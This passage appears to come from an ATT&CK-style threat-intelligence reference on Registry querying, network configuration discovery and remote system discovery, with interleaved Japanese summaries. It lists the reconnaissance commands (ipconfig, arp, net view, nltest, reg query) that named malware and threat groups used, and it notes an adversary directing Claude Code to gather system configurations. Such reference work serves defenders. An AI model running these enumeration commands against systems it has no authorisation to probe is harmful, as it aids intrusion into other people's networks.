obtain Registry data from targeted systems. Carbon enumerates values in the Registry. Azorult can check for installed software on the system under the Registry key <code>Software\Microsoft\Windows\CurrentVersion\Uninstall</code>. Cardinal RAT contains watchdog functionality that periodically ensures <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load</code> is set to point to its executable. Denis queries the Registry for keys and values. A variant of HOPLIGHT hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key <code>SYSTEM\CurrentControlSet\Control\Lsa Name</code>. StoneDrill has looked in the registry to find the default browser path. njRAT can read specific registry values. Ursnif has used Reg to query the Registry for installed programs. ZxShell can query the netsvc group value data located in the svchost group Registry key. BabyShark has executed the <code>reg query</code> command for <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default</code>. Attor has opened the registry and performed query searches. Rising Sun has identified the OS product name from a compromised host by searching the registry for `SOFTWARE\MICROSOFT\Windows NT\ CurrentVersion | ProductName`. Valak can use the Registry for code updates and to collect credentials. Carberp has searched the Image File Execution Options registry key for "Debugger" within every subkey. REvil can query the Registry to get random file extensions to append to encrypted files. FatDuke can get user agent strings for the default browser from <code>HKCU\Software\Classes\http\shell\open\command</code>. LiteDuke can query the Registry to check for the presence of <code>HKCU\Software\KasperskyLab</code>. Pillowmint has used shellcode which reads code stored in the registry keys <code>\REGISTRY\SOFTWARE\Microsoft\DRM</code> using the native Windows API as well as read <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces</code> as part of its C2. Lucifer can check for existing stratum cryptomining information in <code>HKLM\Software\Microsoft\Windows\CurrentVersion\spreadCpuXmr – %stratum info%</code>. Bazar can query <code>Windows\CurrentVersion\Uninstall</code> for installed applications. SUNBURST collected the registry value <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid</code> from compromised hosts. TEARDROP checked that <code>HKU\SOFTWARE\Microsoft\CTF</code> existed before decoding its embedded payload. Dtrack can collect the RegisteredOwner, RegisteredOrganization, and InstallDate registry values. BitPaymer can use the RegEnumKeyW to iterate through Registry keys. BendyBear can query the host's Registry key at <code>HKEY_CURRENT_USER\Console\QuickEdit</code> to retrieve data. Waterbear can query the Registry key <code>"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI"</code> to see if the value `OracleOcilib` exists. Sibot has queried the registry for proxy server information. Stuxnet searches the Registry for indicators of security programs. Industroyer has a data wiper component that enumerates keys in the Registry <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services</code>. WastedLocker checks for specific registry keys related to the <code>UCOMIEnumConnections</code> and <code>IActiveScriptParseProcedure32</code> interfaces. SodaMaster has the ability to query the Registry to detect a key specific to VMware. Clambling has the ability to enumerate Registry keys, including <code>KEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt\strDataDir</code> to search for a bitcoin wallet. Gelsemium can open random files and Registry keys to obscure malware behavior from sandbox analysis. TinyTurla can query the Registry for its configuration information. DarkWatchman can query the Registry to determine if it has already been installed on the system. CharmPower has the ability to enumerate `Uninstall` registry values. LitePower can query the Registry for keys added to execute COM hijacking. SILENTTRINITY can use the `GetRegValue` function to check Registry keys within `HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` and `HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated`. It also contains additional modules that can check software AutoRun values and use the Win32 namespace to get values from HKCU, HKLM, HKCR, and HKCC hives. ZxxZ can search the registry of a compromised host. Milan can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID. Saint Bot has used `check_registry_keys` as part of its environmental checks. Shark can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID. Bumblebee can check the Registry for specific keys. FunnyDream can check `Software\Microsoft\Windows\CurrentVersion\Internet Settings` to extract the `ProxyServer` string. Mori can read data from the Registry including from `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\`. PcShare can search the registry files of a compromised host. Mafalda can enumerate Registry keys with all subkeys and values. SVCReady can search for the `HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System` Registry key to gather system information. Woody RAT can search registry keys to identify antivirus programs on an compromised host. QUIETCANARY has the ability to retrieve information from the Registry. Samurai can query `SOFTWARE\Microsoft\.NETFramework\policy\v2.0` for discovery. Raccoon Stealer queries the Windows Registry to fingerprint the infected host via the `HKLM:\SOFTWARE\Microsoft\Cryptography\MachineGuid` key. DUSTTRAP can enumerate Registry items. BlackByte Ransomware enumerates the Registry, specifically the `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options` key. Kapeka queries registry values for stored configuration information. TRANSLATEXT has queried the following registry key to check for installed Chrome extensions: ` HKCU\Software\Policies\Google\Chrome\ExtensionInstallForcelist `. PUBLOAD has queried Registry values to identify software using `reg query`. RedLine Stealer can query the Windows Registry. Qilin can check `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control SystemStartOptions` to determine if a machine is running in safe mode. 敵対者は、ネットワーク構成（IP・ルーティング等）を探索することがある。 Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route. 敵対者は、インターネットへの到達性や外部への接続状況を確認して、環境やプロキシ構成を把握することがある。Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using Ping, <code>tracert</code>, and GET requests to websites, or performing initial speed testing to confirm bandwidth. 敵対者は、利用可能なWi-Fiネットワークや接続情報を探索して環境を把握することがある。Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of Account Discovery, Remote System Discovery, and other discovery or Credential Access activity to support both ongoing and future campaigns. システムネットワーク構成の探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors used Empire to find the public IP address of a compromised system. During FunnyDream, the threat actors used ipconfig for discovery on remote systems. During Operation CuckooBees, the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat /etc/hosts` commands. During Operation Wocao, threat actors discovered the local network configuration with `ipconfig`. During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host. During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery. During C0018, the threat actors ran `nslookup` and Advanced IP Scanner on the target network. KV Botnet Activity gathers victim IP information during initial installation stages. During ShadowRay, threat actors invoked DNS queries from targeted machines to identify their IP addresses. During RedPenguin, UNC3886 leveraged JunoOS CLI queries to obtain the interface index which contains system and network details. During Operation AkaiRyū, MirrorFace used Arp and `dir` for discovery in compromised environments. During the Anthropic AI-orchestrated Campaign, the adversary configured Claude Code to identify and gather system configurations of discovered devices. During the 2025 Poland Wiper Attacks, the adversaries gathered network configuration details utilizing `arp -a` and `nslookup` commands. Ke3chang has performed local network configuration discovery using <code>ipconfig</code>. APT1 used the <code>ipconfig /all</code> command to gather network configuration information. Turla surveys a system upon check-in to discover network configuration details using the <code>arp -a</code>, <code>nbtstat -n</code>, <code>net config</code>, <code>ipconfig /all</code>, and <code>route</code> commands, as well as NBTscan. Turla RPC backdoors have also retrieved registered RPC interface information from process memory. Darkhotel has collected the IP address and network adapter information from the victim’s machine. admin@338 actors used the following command after exploiting a machine with LOWBALL malware to acquire information about local networks: <code>ipconfig /all >> %temp%\download</code> Naikon uses commands such as <code>netsh interface show</code> to discover network interface settings. A keylogging tool used by APT3 gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway. Threat Group-3390 actors use NBTscan to discover vulnerable systems. Lotus Blossom has used commands such as `ipconfig` and `netstat` to gather network information on compromised hosts. Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available. Dragonfly has used batch scripts to enumerate network information, including information about trusts, zones, and the domain. Stealth Falcon malware gathers the Address Resolution Protocol (ARP) table from the victim. menuPass has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions. OilRig has run <code>ipconfig /all</code> on a victim. APT32 used the <code>ipconfig /all</code> command to gather the IP address from the system. Magic Hound malware gathers the victim's local IP address, MAC address, and external IP address. MuddyWater has used malware to collect the victim’s IP address and domain name. APT19 used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim’s machine. Tropic Trooper has used scripts to collect the host's network topology. GALLIUM used <code>ipconfig /all</code> to obtain information about the victim network configuration. The group also ran a modified version of NBTscan to identify available NetBIOS name servers. Kimsuky has used `ipconfig/all` and web beacons sent via email to gather network configuration information. Kimsuky has also identified Host IP addresses leveraging the WMI class `Win32_NetworkAdapterConfiguration`. APT41 collected MAC addresses from victim machines. Wizard Spider has used ipconfig to identify the network configuration of a victim machine. Wizard Spider has also used the PowerShell cmdlet `Get-ADComputer` to collect IP address data from Active Directory. Chimera has used ipconfig, Ping, and <code>tracert</code> to enumerate the IP address and network environment and settings of the local host. Sidewinder has used malware to collect information on network interfaces, including the MAC address. HAFNIUM has collected IP information via IPInfo. Higaisa used <code>ipconfig</code> to gather network configuration information. ZIRCONIUM has used a tool to enumerate proxy settings in the target environment. Mustang Panda has used <code>ipconfig</code> and <code>arp</code> to determine network configuration information. Mustang Panda has also utilized SharpNBTScan to scan the victim environment. TeamTNT has enumerated the host machine’s IP address. HEXANE has used Ping and `tracert` for network discovery. Earth Lusca used the command <code>ipconfig</code> to obtain information about network configurations. SideCopy has identified the IP address of a compromised host. Moses Staff has collected the domain name of a compromised network. Scattered Spider has used network reconnaissance commands for discovery including `ping` and `nltest`. FIN13 has used `nslookup` and `ipconfig` for network reconnaissance efforts. FIN13 has also utilized a compromised Symantec Altiris console and LanDesk account to retrieve network information. Volt Typhoon has executed multiple commands to enumerate network topology and settings including `ipconfig`, `netsh interface firewall show all`, and `netsh interface portproxy show all`. Moonstone Sleet has gathered information on victim network configuration. Play has used the information-stealing tool Grixba to enumerate network information. BlackByte used tools such as Arp to pull system network information and identify connected devices. APT42 has used malware, such as GHAMBAR and POWERPOST, to collect network information. Medusa Group has obtained host network details utilizing the command `cmd.exe /c ipconfig /all`. MirrorFace has used ipconfig for reconnaissance. Taidoor has collected the MAC address of a compromised host; it can also use <code>GetAdaptersInfo</code> to identify network adapters. PlugX has captured victim IP address details of the targeted machine. Ixeshe enumerates the IP address, network proxy settings, and domain name from a victim's system. Sykipot may use <code>ipconfig /all</code> to gather system network configuration details. Dyre has the ability to identify network settings on a compromised host. The reconnaissance modules used with Duqu can collect information on network configuration. A JHUHUGIT variant gathers network interface card information. GeminiDuke collects information on network settings and Internet proxy settings from the victim. Sys10 collects the local IP address of the victim and sends it to the C2. Elise executes <code>ipconfig /all</code> after initial communication is made to the remote server. Emissary has the capability to execute the command <code>ipconfig /all</code>. Mis-Type may create a file containing the results of the command <code>cmd.exe /c ipconfig /all</code>. S-Type has used `ipconfig /all` on a compromised host. BlackEnergy has gathered information about network IP configurations using ipconfig.exe and about routing tables using route.exe. Epic uses the <code>nbtstat -n</code> and <code>nbtstat -s</code> commands on the victim’s machine. Agent.btz collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file. Backdoor.Oldrea collects information about the Internet adapter configuration. Trojan.Karagany can gather information on the network configuration of a compromised host. T9000 gathers and beacons the MAC and IP addresses during installation. Arp can be used to display ARP configuration information on the host. ipconfig can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP. ifconfig can be used to display adapter configuration on Unix systems, including information for TCP/IP, DNS, and DHCP. nbtstat can be used to discover local NetBIOS domain names. route can be used to discover routing configuration information. A module in Prikormka collects information from the victim about its IP addresses and MAC addresses. Crimson contains a command to collect the victim MAC address and LAN IP. Pisloader has a command to collect the victim's IP address. Remsec can obtain information about network configuration, including the routing table, ARP cache, and DNS cache. Unknown Logger can obtain information about the victim's IP address. PowerDuke has a command to get the victim's domain and NetBIOS name. Shamoon obtains the target's IP address and local network segment. MoonWind obtains the victim IP address. RedLeaves can obtain information about network parameters. Cobalt Strike can determine the NetBios name and the IP addresses of targets machines including domain controllers. OSInfo discovers the current domain information. Felismus collects the victim LAN IP address and sends it to the C2 server. Reaver collects the victim's IP address. Volgmer can gather the IP address from the victim's machine. FALLCHILL collects MAC address and local IP address information from the victim. POWRUNER may collect network configuration data by running <code>ipconfig /all</code> on a victim. Pupy has built in commands to identify a host’s IP address and find out other network configuration settings by viewing connected sessions. NETWIRE can collect the IP address of a compromised host. JPIN can obtain network information, including DNS, IP, and proxies. Hydraq creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines. Naid collects the domain name from a compromised host. POWERSTATS can retrieve IP, network adapter configuration information, and domain from compromised hosts. NanHaiShu can gather information about the victim proxy server. Orz can gather victim proxy information. ZeroT gathers the victim's IP address and domain information, and then sends it to its C2 server. Bandook has a command to get the public IP address from a system. Kwampirs collects network adapter and interface information by using the commands <code>ipconfig /all</code>, <code>arp -a</code> and <code>route print</code>. It also collects the system's MAC address with <code>getmac</code> and domain configuration with <code>net config workstation</code>. GravityRAT collects the victim IP address, MAC address, as well as the victim account domain name. Proxysvc collects the network adapter information and domain/username information based on current remote sessions. RATANKBA gathers the victim’s IP address via the <code>ipconfig -all</code> command. Comnie uses <code>ipconfig /all</code> and <code>route PRINT</code> to identify network adapter and interface information. BADCALL collects the network adapter information. yty runs <code>ipconfig /all</code> and collects the domain name. Koadic can retrieve the contents of the IP routing table as well as information about the Windows domain. Zebrocy runs the <code>ipconfig /all</code> command. Brave Prince gathers network configuration information as well as the ARP cache. PLAINTEE uses the <code>ipconfig /all</code> command to gather the victim’s IP address. Mosquito uses the <code>ipconfig</code> command. VERMIN gathers the local IP address. InvisiMole gathers information on the IP forwarding table, MAC address, configured proxy, and network SSID. Catchamas gathers the Mac address, IP address, and the network adapter information from the victim’s machine. QuasarRAT has the ability to enumerate the Wide Area Network (WAN) IP through requests to ip-api[.]com, freegeoip[.]net, or api[.]ipify[.]org observed with user-agent string `Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0`. Kazuar gathers information about network adapters. TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine. FELIXROOT collects information about the network including the IP address and DHCP server. Bisonal can execute <code>ipconfig</code> on the victim’s machine. QUADAGENT gathers the current domain the victim system belongs to. RogueRobin gathers the IP address and domain from the victim’s machine. KEYMARBLE gathers the MAC address of the victim’s machine. Calisto runs the <code>ifconfig</code> command to obtain the IP address from the victim’s machine. UPPERCUT has the capability to gather the victim's proxy information. iKitten will look for the current IP address. jRAT can gather victim internal and external IPs. More_eggs has the capability to gather the IP address from the victim's machine. Agent Tesla can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings. Carbon can collect the IP address of the victims and other computers on the network using the commands: <code>ipconfig -all</code> <code>nbtstat -n</code>, and <code>nbtstat -s</code>. NanoCore gathers the IP address from the victim’s machine. Octopus can collect the host IP address from the victim’s machine. Xbash can collect IP addresses and local intranet information from a victim’s machine. Azorult can collect host IP information from the victim’s machine. OceanSalt can collect the victim’s IP address. zwShell can obtain the victim IP address. OSX_OCEANLOTUS.D can collect the network interface MAC address on the infected host. NOKKI can gather information on the victim IP address. Denis uses <code>ipconfig</code> to gather the IP address from the system. KONNI can collect the IP address from the victim’s machine. Nltest may be used to enumerate the parent domain of a local machine using <code>/parentdomain</code>. Empire can acquire network configuration information like DNS servers, public IP, and network proxies used by a host. Olympic Destroyer uses API calls to enumerate the infected system's ARP table. WannaCry will attempt to determine the local network segment it is a part of. Astaroth collects the external IP address from the system. SpeakUp uses the <code>ifconfig -a</code> command. PoshC2 can enumerate network adapter information. Revenge RAT collects the IP address and MAC address from the system. KeyBoy can determine the public or WAN IP address for the system. LightNeuron gathers information about network adapters using the Win32 API call <code>GetAdaptersInfo</code>. Machete collects the MAC address of the target computer and other network configuration information. BabyShark has executed the <code>ipconfig /all</code> command. HotCroissant has the ability to identify the IP address of the compromised machine. Rifdoor has the ability to identify the IP address of the compromised host. TSCookie has the ability to identify the IP of the infected host. Okrum can collect network information, including the host IP address, DNS, and proxy information. PowerShower has the ability to identify the current Windows domain of the infected host. ShimRatReporter gathered the local proxy, domain, IP, routing tables, mac address, gateway, DNS servers, and DHCP status information from an infected host. Ryuk has called <code>GetIpNetTable</code> in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries. Lokibot has the ability to discover the domain name of the infected host. Rising Sun can detect network adapter and IP address information. SHARPSTATS has the ability to identify the domain of the compromised host. LoudMiner used a script to gather the IP address of the infected machine before sending to the C2. USBferry can detect the infected machine's network topology using <code>ipconfig</code> and <code>arp</code>. Aria-body has the ability to identify the location, public IP address, and domain name on a compromised host. Ramsay can use ipconfig and Arp to collect network configuration information, including routing information and ARP tables. SDBbot has the ability to determine the domain name and whether a proxy is configured on a compromised host. TajMahal has the ability to identify the MAC address on an infected host. down_new has the ability to identify the MAC address of a compromised host. Avenger can identify the domain of the compromised host. Valak has the ability to identify the domain and the MAC and IP addresses of an infected machine. IcedID used the `ipconfig /all` command and a batch script to gather network information. Bonadan can find the external IP address of the infected host. Kessel has collected the DNS address of the infected host. CrackMapExec can collect DNS information from the targeted system. StrongPity can identify the IP address of a compromised host. PipeMon can collect and send the local IP address, RDP information, and the network adapter physical address as a part of its C2 beacon. Anchor can determine the public IP and location of a compromised host. FatDuke can identify the MAC address on the target computer. LiteDuke has the ability to discover the proxy configuration of Firefox and/or Opera. WellMess can identify the IP address and user domain on the target machine. WellMail can identify the IP address of the victim system. SoreFang can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via <code>ipconfig.exe /all</code>. BLINDINGCAN has collected the victim machine's local IP address information and MAC address. Grandoreiro can determine the IP and physical location of the compromised host via IPinfo. Lucifer can collect the IP address of a compromised host. Bazar can collect the IP address and NetBIOS name of an infected machine. AdFind can extract subnet information from Active Directory. Pay2Key can identify the IP and MAC addresses of the compromised host. SUNBURST collected all network interface MAC addresses that are up and not loopback devices, as well as IP address, DHCP configuration, and domain information. Dtrack can collect the host's IP addresses using the <code>ipconfig</code> command. Explosive has collected the MAC address from the victim's machine. Caterpillar WebShell can gather the IP address from the victim's machine using the IP config command. Conti can retrieve the ARP cache from the local system by using the <code>GetIpNetTable()</code> API call and check to ensure IP addresses it connects to are for local, non-Internet, systems. Pysa can perform network reconnaissance using the Advanced IP Scanner tool. Penquin can report the IP of the compromised host to attacker controlled infrastructure. GoldMax retrieved a list of the system's network interface after execution. Sibot checked if the compromised system is configured to use proxies. NBTscan can be used to collect MAC addresses. ShadowPad has collected the domain name of the victim system. Stuxnet collects the IP address of a compromised system. Industroyer’s 61850 payload component enumerates connected network adapters and their corresponding IP addresses. EKANS can determine the domain of a compromised host. SideTwist has the ability to collect the domain name on a compromised host. AppleSeed can identify the IP of a targeted system. Cuba can retrieve the ARP cache from the local system by using <code>GetIpNetTable</code>. GrimAgent can enumerate the IP and domain of a target system. Sliver has the ability to gather network configuration information. Avaddon can collect the external IP address of the victim. Kobalos can record the IP address of the target machine. BADFLICK has captured victim IP address details. SpicyOmelette can identify the IP of a compromised system. Turian can retrieve the internal IP address of a compromised host. QakBot can use <code>net config workstation</code>, <code>arp -a</code>, `nslookup`, and <code>ipconfig /all</code> to gather network configuration information. BoxCaon can collect the victim's MAC address by using the <code>GetAdaptersInfo</code> API. xCaon has used the GetAdaptersInfo() API call to get the victim's MAC address. BLUELIGHT can collect IP information from the victim’s machine. Diavol can enumerate victims' local and external IPs when registering with C2. Clambling can enumerate the IP address of a compromised machine. SysUpdate can collected the IP address and domain name of a compromised host. Chrommme can enumerate the IP address of a compromised host. CharmPower has the ability to use <code>ipconfig</code> to enumerate system network settings. Torisma can collect the local MAC address using `GetAdaptersInfo` as well as the system's IP address. Lizar has retrieved network information from a compromised host, such as the MAC address. Cyclops Blink can use the Linux API `if_nameindex` to gather network interface names. Green Lambert can obtain proxy information from a victim's machine using system environment variables. Neoichor can gather the IP address from an infected host. Flagpro has been used to execute the <code>ipconfig /all</code> command on a victim system. Milan can run `C:\Windows\system32\cmd.exe /c cmd /c ipconfig /all 2>&1` to discover network settings. MacMa can collect IP addresses from a compromised host. Saint Bot can collect the IP address of a victim machine. Kevin can collect the MAC address and other information from a victim machine using `ipconfig/all`. The IceApple ifconfig module can iterate over all network interfaces on the host and retrieve the name, description, MAC address, DNS suffix, DNS servers, gateways, IPv4 addresses, and subnet masks. CreepySnail can use `getmac` and `Get-NetIPAddress` to enumerate network settings. Amadey can identify the IP address of a victim machine. Action RAT has the ability to collect the MAC address of an infected host. Squirrelwaffle has collected the victim’s external IP address. PingPull can retrieve the IP address of a compromised host. Small Sieve can obtain the IP address of a victim host. STARWHALE has the ability to collect the IP address of an infected host. FunnyDream can parse the `ProxyServer` string in the Registry to discover http proxies. PcShare can obtain the proxy settings of a compromised machine using `InternetQueryOptionA` and its IP address by running `nslookup myip.opendns.comresolver1.opendns.com\r\n`. DEADEYE can discover the DNS domain name of a targeted system. Mafalda can use the `GetAdaptersInfo` function to retrieve information about network adapters and the `GetIpNetTable` function to retrieve the IPv4 to physical network address mapping table. Woody RAT can retrieve network interface and proxy information. Royal can enumerate IP addresses using `GetIpAddrTable`. KOPILUWAK can use Arp to discover a target's network configuration setttings. QUIETCANARY can identify the default proxy setting on a compromised host. Sardonic has the ability to execute the `ipconfig` command. AsyncRAT can enumerate the NetBIOS name on targeted machines. Ninja can enumerate the IP address on compromised systems. NGLite identifies the victim system MAC and IPv4 addresses and uses these to establish a victim identifier. SocGholish has the ability to enumerate the domain name of a victim, as well as if the host is a member of an Active Directory domain. Gootloader can use an embedded script to check the IP address of potential victims visiting compromised websites. LunarWeb can use shell commands to discover network adapters and configuration. LunarLoader can verify the targeted host's DNS name which is then used in the creation of a decyrption key. Pikabot gathers victim network information through commands such as <code>ipconfig</code> and <code>ipconfig /all</code>. Nightdoor gathers information on victim system network configuration such as MAC addresses. Manjusaka gathers information about current network connections, local and remote addresses associated with them, and associated processes. DUSTTRAP can enumerate infected system network information. Latrodectus can discover the IP and MAC address of a targeted host. ShrinkLocker captures the IP address of the victim system and sends this to the attacker following encryption. MagicRAT collects system network information using commands such as `ipconfig /all`. BOLDMOVE enumerates network interfaces on the infected host. Troll Stealer collects the MAC address of victim devices. Gomir collects network information on infected systems such as listing interface names, MAC and IP addresses, and IPv6 addresses. J-magic can compare the host and remote IPs to check if a received packet is from the infected machine. cd00r can discover the IP for the network interface on the compromised device. Sagerunex will gather system information such as MAC and IP addresses. PUBLOAD has obtained information about local networks through the `ipconfig /all` command. Havoc has a module for network enumeration including determining IP addresses. RedLine Stealer can enumeate information about victims’ systems including IP addresses. Qilin can accept a command line argument identifying specific IPs. InvisibleFerret has collected the local IP address, and external IP. XORIndex Loader has leveraged webservices to identify the public IP of the victim host. HexEval Loader has leveraged server-side client configurations to identify the public IP of the victim host. evilginx2 can capture information from each session with a victim including the public IP used to access the server and the user agent. LODEINFO can enumerate the MAC address of the compromised host. LAMEHUG can enumerate network information on compromised hosts. 敵対者は、ネットワーク上の他システムを探索することがある。 Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping, <code>net view</code> using Net, or, on ESXi servers, `esxcli network diag ping`. リモートシステムの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During FunnyDream, the threat actors used several tools and batch files to map victims' internal networks. During Operation CuckooBees, the threat actors used the `net view` and `ping` commands as part of their advanced reconnaissance. During Operation Wocao, threat actors used `nbtscan` and `ping` to discover remote systems, as well as `dsquery subnet` on a domain controller to retrieve all subnets in the Active Directory. During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration. During the SolarWinds Compromise, APT29 used AdFind to enumerate remote systems. During the 2016 Ukraine Electric Power Attack, Sandworm Team checked for connectivity to resources within the network and used LDAP to query Active Directory, discovering information about computers listed in AD. During the 2015 Ukraine Electric Power Attack, Sandworm Team remotely discovered systems over LAN connections. OT systems were visible from the IT network as well, giving adversaries the ability to discover operational assets. Leviathan performed extensive remote host enumeration to build their own map of victim networks during Leviathan Australian Intrusions. During Operation Digital Eye, threat actors used Ping for reconnaissance. Ke3chang has used network scanning and enumeration tools, including Ping. Deep Panda has used ping to identify other machines of interest. Turla surveys a system upon check-in to discover remote systems on a local network using the <code>net view</code> and <code>net view /DOMAIN</code> commands. Turla has also used <code>net group "Domain Computers" /domain</code>, <code>net group "Domain Controllers" /domain</code>, and <code>net group "Exchange Servers" /domain</code> to enumerate domain computers, including the organization's DC and Exchange Server. Naikon has used a netbios scanner for remote machine identification. APT3 has a tool that can detect the existence of remote systems. Threat Group-3390 has used the <code>net view</code> command. Lotus Blossom has used Ping to identify remote systems. Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD. Dragonfly has likely obtained a list of hosts in the victim environment. FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS. menuPass uses scripts to enumerate IP ranges on the victim network. menuPass has also issued the command <code>net view /domain</code> to a PlugX implant to gather information about remote systems on the network. APT32 has enumerated DC servers using the command <code>net group "Domain Controllers" /domain</code>. The group has also used the <code>ping</code> command. FIN5 has used the open source tool Essential NetTools to map the network and build a list of targets. Magic Hound has used Ping for discovery on targeted networks. BRONZE BUTLER typically use <code>ping</code> and Net to enumerate systems. FIN8 has used dsquery and other Active Directory utilities to enumerate hosts; they have also used <code>nltest.exe /dclist</code> to retrieve a list of domain controllers. Leafminer used Microsoft’s Sysinternals tools to gather detailed information about remote systems. APT39 has used NBTscan and custom tools to discover remote systems. Silence has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts. GALLIUM used a modified version of NBTscan to identify available NetBIOS name servers over the network as well as <code>ping</code> to identify remote systems. APT41 has used MiPing to discover active systems in the victim network. Wizard Spider has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. Wizard Spider has also used AdFind, <code>nltest/dclist</code>, and PowerShell script Get-DataInfo.ps1 to enumerate domain computers, including the domain controller. Rocke has looked for IP addresses in the known_hosts file on the infected system and attempted to SSH into them. Chimera has utilized various scans and queries to find domain controllers and remote services in the target environment. Fox Kitten has used Angry IP Scanner to detect remote systems. Indrik Spider has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database. HAFNIUM has enumerated domain controllers using `net group "Domain computers"` and `nltest /dclist`. Mustang Panda has queried Active Directory for computers using AdFind. Mustang Panda has also utilized SharpNBTScan to scan the victim environment. HEXANE has used `net view` to enumerate domain machines. Ember Bear has used tools such as Nmap and MASSCAN for remote service discovery. Earth Lusca used the command <code>powershell “Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list - property * | findstr “Address””</code> to find the network information of successfully logged-in accounts to discovery addresses of other machines. Earth Lusca has also used multiple scanning tools to discover other machines within the same compromised network. Scattered Spider can enumerate remote systems, such as VMware vCenter infrastructure. Volt Typhoon has used multiple methods, including Ping, to enumerate systems on compromised networks. ToddyCat has used `ping %REMOTE_HOST%` for post exploit discovery. Akira uses software such as Advanced IP Scanner and MASSCAN to identify remote hosts within victim networks. Agrius used the tool NBTscan to scan for remote, accessible hosts in victim environments. Play has used tools such as AdFind, Nltest, and BloodHound to enumerate shares and hostnames on compromised networks. BlackByte used tools such as Arp to identify remotely-connected devices. Medusa Group has used PDQ Inventory to get an inventory of the endpoints on the network. MirrorFace has used Ping for system discovery. Sykipot may use <code>net view /domain</code> to display hostnames of available systems on a network. Commands such as <code>net view</code> can be used in Net to gather information about available remote systems. SHOTPUT has a command to list all servers in the domain, as well as one to locate domain controllers on a domain. Epic uses the <code>net view</code> command on the victim’s machine. Backdoor.Oldrea can enumerate and map ICS-specific systems in victim environments. Ping can be used to identify remote systems within a network. Arp can be used to display a host's ARP cache, which may include address resolutions for remote systems. Remsec can ping or traceroute a remote host. Shamoon scans the C-class subnet of the IPs on the victim's interfaces. Cobalt Strike uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network. OSInfo performs a connection test to discover remote systems in the network MURKYTOP has the capability to identify remote hosts on connected networks. Kwampirs collects a list of available servers with the command <code>net view</code>. RATANKBA runs the <code>net view /domain</code> and <code>net view</code> commands. Comnie runs the <code>net view</code> command yty uses the <code>net view</code> command for discovery. TrickBot can enumerate computers and network devices. Carbon uses the <code>net view</code> command. Nltest may be used to enumerate remote domain controllers using options such as <code>/dclist</code> and <code>/dsgetdc</code>. Olympic Destroyer uses Windows Management Instrumentation to enumerate all systems in the network. WannaCry scans its local network segment for remote systems to try to exploit and copy itself to. njRAT can identify remote hosts on connected networks. PoetRAT used Nmap for remote system discovery. USBferry can use <code>net view</code> to gather information about remote systems. CrackMapExec can discover active IP addresses, along with the machine name, within a targeted network. BloodHound can enumerate and collect the properties of domain computers, including domain controllers. Bazar can enumerate remote systems using <code> Net View</code>. AdFind has the ability to query Active Directory for computers. BitPaymer can use <code>net view</code> to discover remote systems. Conti has the ability to discover hosts on a target network. The TAINTEDSCRIBE command and execution module can perform target system enumeration. NBTscan can list NetBIOS computer names. Kinsing has used a script to parse files like <code>/etc/hosts</code> and SSH <code>known_hosts</code> to discover remote systems. Industroyer can enumerate remote computers in the compromised network. 